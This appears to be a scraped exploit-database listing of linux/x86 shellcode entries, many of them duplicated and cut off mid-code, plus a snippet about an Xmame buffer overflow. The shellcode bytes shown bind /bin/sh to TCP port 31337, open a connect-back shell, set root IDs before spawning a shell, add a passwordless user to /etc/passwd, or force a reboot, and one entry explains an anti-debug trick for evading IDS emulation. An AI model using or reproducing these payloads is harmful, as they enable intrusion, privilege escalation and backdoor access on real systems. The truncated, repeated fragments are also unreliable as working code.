linux/x86 normal exit w/ random (so to speak) return value 5 bytes
Exploit for linux/x86 platform in category shellcode. linux/x86 normal exit w/ random so to speak return value 5 bytes / linux/x86 normal exit w/ random so to speak...
linux/x86 Bind /bin/sh to 31337/tcp 80 bytes
Exploit for linux/x86 platform in category shellcode. linux/x86 Bind /bin/sh to 31337/tcp 80 bytes / linux/x86 bind '/bin/sh' to 31337/tcp - 80 bytes - izik / char shellcode = "\x6a\x66" // push $0x66 "\x58" ...
linux/x86 normal exit w/ random (so to speak) return value 5 bytes
No description provided by source. / linux/x86 normal exit w/ random so to speak return value - 5 bytes - izik / char shellcode = "\x31\xc0" // xor %eax,%eax "\x40" // inc %eax "\xcd\x80"; // int $0x80 int mainint argc, char argv int ret; ret = int &ret + 2; ret = int shellcode; //...
linux/x86 normal exit with random so to speak return value 5 bytes
linux/x86 normal exit w/ random so to speak return value 5 bytes. Shellcode exploit for linux/x86 platform / linux/x86 normal exit w/ random so to speak return value - 5 bytes - izik / char shellcode = "\x31\xc0" // xor %eax,%eax "\x40" // inc %eax "\xcd\x80"; // int $0x80 int mainint argc, char arg...
linux/x86 quick (yet conditional, eax != 0 and edx == 0) exit 4 bytes
Exploit for linux/x86 platform in category shellcode. linux/x86 quick yet conditional, eax != 0 and edx == 0 exit 4 bytes / linux/x86 quick yet conditional, e...
linux/x86 Bind /bin/sh to 31337/tcp 80 bytes
No description provided by source. / linux/x86 bind '/bin/sh' to 31337/tcp - 80 bytes - izik / char shellcode = "\x6a\x66" // push $0x66 "\x58" // pop %eax "\x99" // cltd "\x6a\x01" // push $0x1 "\x5b" // pop %ebx "\x52" // push %edx "\x53" // push %ebx "\x6a\x02" // push $0x2 // /...
linux/x86 reboot() - 20 bytes
Exploit for linux/x86 platform in category shellcode. linux/x86 reboot() - 20 bytes / linux/x86 reboot(LINUX_REBOOT_MAGIC1, LINUX_REBOOT_MAGIC2, LINUX_REBOOT_CMD_RESTART) - 20 bytes - izik / char shellcode = "\x6a\x58" // push $0x58 "\x58" // pop %e...
Xmame 0.102 - -pb-lang-rec Local Buffer Overflow
Xmame 0.102 - -pb-lang-rec Local Buffer Overflow / xmame-expl.c by sj. On 20th of Jan it came to my attention that Xmame suffered from several buffer overflow problems. Thinking this issue was resolved, I installed Xmame on my Ubuntu laptop, from the Ubuntu repositories which installed...
linux/x86 reboot() - 20 bytes
No description provided by source. / linux/x86 reboot(LINUX_REBOOT_MAGIC1, LINUX_REBOOT_MAGIC2, LINUX_REBOOT_CMD_RESTART) - 20 bytes - izik / char shellcode = "\x6a\x58" // push $0x58 "\x58" // pop %eax "\xbb\xad\xde\xe1\xfe" // mov $0xfee1dead,%ebx "\xb9\x69\x19\x12\x28" // mov...
linux/x86 anti-debug trick (INT 3h trap) + execve /bin/sh 39 bytes
No description provided by source. / linux/x86 anti-debug trick INT 3h trap + execve"/bin/sh", "/bin/sh", NULL, NULL - 39 bytes The idea behind a shellcode w/ an anti-debugging trick embedded in it, is if for any reason the IDS would try to x86-emulate the shellcode it would glitch and fail. This...
linux/x86 setreuid0, 0 + execve/bin/sh 31 bytes
linux/x86 setreuid0, 0 + execve/bin/sh 31 bytes. Shellcode exploit for linux/x86 platform / linux/x86 setreuid0, 0 + execve"/bin/sh", "/bin/sh", NULL, NULL - 31 bytes - izik / char shellcode = "\x6a\x46" // push $0x46 "\x58" // pop %eax "\x31\xdb" // xor %ebx,%ebx "\x31\xc9" // xor %ecx,%ecx...
linux/x86 Adduser without Password to /etc/passwd 59 bytes
Exploit for linux/x86 platform in category shellcode. linux/x86 Adduser without Password to /etc/passwd 59 bytes / linux/x86 adds user 'xtz' without password to /etc/passwd - 59...
linux/x86 connect-back shellcode 127.0.0.1:31337/tcp 74 bytes
No description provided by source. / linux/x86 connect-back shellcode, 127.0.0.1:31337/tcp - 74 bytes - izik / char shellcode = "\x6a\x66" // push $0x66 "\x58" // pop %eax "\x99" // cltd "\x6a\x01" // push $0x1 "\x5b" // pop %ebx "\x52" // push %edx "\x53" // push %ebx "\x6a\x02" /...
linux/x86 quick (yet conditional eax != 0 and edx == 0) exit 4 bytes
No description provided by source. / linux/x86 quick yet conditional, eax != 0 and edx == 0 exit - 4 bytes - izik / char shellcode = "\xf7\xf0" // div %eax "\xcd\x80"; // int $0x80 int mainint argc, char argv int ret; ret = int &ret + 2; ret = int shellcode; // milw0rm.com 2006-01-...
linux/x86 execve(/bin/sh) / PUSH - 23 bytes
No description provided by source. / linux/x86 execve"/bin/sh", "/bin/sh", NULL / PUSH - 23 bytes - izik / char shellcode = "\x6a\x0b" // push $0xb "\x58" // pop %eax "\x99" // cltd "\x52" // push %edx "\x68\x2f\x2f\x73\x68" // push $0x68732f2f "\x68\x2f\x62\x69\x6e" // push...
linux/x86 getppid() + execve(/proc/pid/exe) 51 bytes
Exploit for linux/x86 platform in category shellcode. linux/x86 getppid + execve/proc/pid/exe 51 bytes / linux/x86 getppid + execve"/proc//exe", "/proc//exe", NULL - 51 bytes - izik / char...
linux/x86 setreuid(0, 0) + execve(/bin/sh) 31 bytes
Exploit for linux/x86 platform in category shellcode. linux/x86 setreuid0, 0 + execve/bin/sh 31 bytes / linux/x86 setreuid0, 0 + execve"/bin/sh", "/bin/sh", NULL, NULL - 31 bytes - izik / char...
linux/x86 eject cd-rom follows /dev/cdrom symlink + exit 40 bytes
linux/x86 eject cd-rom follows /dev/cdrom symlink + exit 40 bytes. Shellcode exploit for linux/x86 platform / linux/x86 eject cd-rom follows "/dev/cdrom" symlink + exit - 40 bytes - izik / char shellcode = "\x6a\x05" // push $0x5 "\x58" // pop %eax "\x31\xc9" // xor %ecx,%ecx "\x51" // push %ecx...
linux/x86 Bind /bin/sh to 31337/tcp + fork 98 bytes
linux/x86 Bind /bin/sh to 31337/tcp + fork 98 bytes. Shellcode exploit for linux/x86 platform / linux/x86 bind '/bin/sh' to 31337/tcp + fork - 98 bytes - izik / char shellcode = "\x6a\x66" // push $0x66 "\x58" // pop %eax "\x99" // cltd "\x6a\x01" // push $0x1 "\x5b" // pop %ebx "\x52" // push %edx...
linux/x86 anti-debug trick INT 3h trap + execve /bin/sh 39 bytes
linux/x86 anti-debug trick INT 3h trap + execve /bin/sh 39 bytes. Shellcode exploit for linux/x86 platform / linux/x86 anti-debug trick INT 3h trap + execve"/bin/sh", "/bin/sh", NULL, NULL - 39 bytes The idea behind a shellcode w/ an anti-debugging trick embedded in it, is if for any reason the IDS...